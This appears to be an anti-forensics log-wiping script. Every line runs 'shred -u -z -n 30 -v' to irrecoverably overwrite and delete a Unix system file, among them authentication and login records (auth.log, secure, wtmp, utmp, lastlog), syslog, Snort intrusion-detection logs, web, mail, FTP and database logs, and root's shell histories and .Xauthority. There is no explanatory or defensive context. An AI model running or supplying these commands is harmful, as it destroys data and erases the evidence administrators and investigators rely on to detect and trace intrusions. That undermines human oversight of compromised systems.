shred -u -z -n 30 -v /var/log/lastlog
shred -u -z -n 30 -v /var/log/messages
shred -u -z -n 30 -v /var/log/warn
shred -u -z -n 30 -v /var/log/wtmp
shred -u -z -n 30 -v /var/log/poplog
shred -u -z -n 30 -v /var/log/qmail
shred -u -z -n 30 -v /var/log/smtpd
shred -u -z -n 30 -v /var/log/telnetd
shred -u -z -n 30 -v /var/log/secure
shred -u -z -n 30 -v /var/log/auth
shred -u -z -n 30 -v /var/log/auth.log
shred -u -z -n 30 -v /var/log/cups/access_log
shred -u -z -n 30 -v /var/log/cups/error_log
shred -u -z -n 30 -v /var/log/thttpd_log
shred -u -z -n 30 -v /var/log/spooler
shred -u -z -n 30 -v /var/spool/tmp
shred -u -z -n 30 -v /var/spool/errors
shred -u -z -n 30 -v /var/spool/locks
shred -u -z -n 30 -v /var/log/nctfpd.errs
shred -u -z -n 30 -v /var/log/acct
shred -u -z -n 30 -v /var/apache/log
shred -u -z -n 30 -v /var/apache/logs
shred -u -z -n 30 -v /usr/local/apache/log
shred -u -z -n 30 -v /usr/local/apache/logs
shred -u -z -n 30 -v /usr/local/www/logs/thttpd_log
shred -u -z -n 30 -v /var/log/news
shred -u -z -n 30 -v /var/log/news/news
shred -u -z -n 30 -v /var/log/news.all
shred -u -z -n 30 -v /var/log/news/news.all
shred -u -z -n 30 -v /var/log/news/news.crit
shred -u -z -n 30 -v /var/log/news/news.err
shred -u -z -n 30 -v /var/log/news/news.notice
shred -u -z -n 30 -v /var/log/news/suck.err
shred -u -z -n 30 -v /var/log/news/suck.notice
shred -u -z -n 30 -v /var/log/xferlog
shred -u -z -n 30 -v /var/log/proftpd/xferlog.legacy
shred -u -z -n 30 -v /var/log/proftpd.xferlog
shred -u -z -n 30 -v /var/log/proftpd.access_log
shred -u -z -n 30 -v /var/log/httpd/error_log
shred -u -z -n 30 -v /var/log/httpsd/ssl_log
shred -u -z -n 30 -v /var/log/httpsd/ssl.access_log
shred -u -z -n 30 -v /var/adm
shred -u -z -n 30 -v /var/run/utmp
shred -u -z -n 30 -v /etc/wtmp
shred -u -z -n 30 -v /etc/utmp
shred -u -z -n 30 -v /etc/mail/access
shred -u -z -n 30 -v /var/log/mail/info.log
shred -u -z -n 30 -v /var/log/mail/errors.log
shred -u -z -n 30 -v /var/log/httpd/*_log
shred -u -z -n 30 -v /var/log/ncftpd/misclog.txt
shred -u -z -n 30 -v /var/account/pacct
shred -u -z -n 30 -v /var/log/snort
shred -u -z -n 30 -v /var/log/bandwidth
shred -u -z -n 30 -v /var/log/explanations
shred -u -z -n 30 -v /var/log/syslog
shred -u -z -n 30 -v /var/log/user.log
shred -u -z -n 30 -v /var/log/daemons/info.log
shred -u -z -n 30 -v /var/log/daemons/warnings.log
shred -u -z -n 30 -v /var/log/daemons/errors.log
shred -u -z -n 30 -v /etc/httpd/logs/error_log
shred -u -z -n 30 -v /etc/httpd/logs/*_log
shred -u -z -n 30 -v /var/log/mysqld/mysqld.log'
shred -u -z -n 30 -v /root/.ksh_history
shred -u -z -n 30 -v /root/.bash_history
shred -u -z -n 30 -v /root/.sh_history
shred -u -z -n 30 -v /root/.history
shred -u -z -n 30 -v /root/*_history
shred -u -z -n 30 -v /root/.login
shred -u -z -n 30 -v /root/.logout
shred -u -z -n 30 -v /root/.bash_logut
shred -u -z -n 30 -v /root/.Xauthority
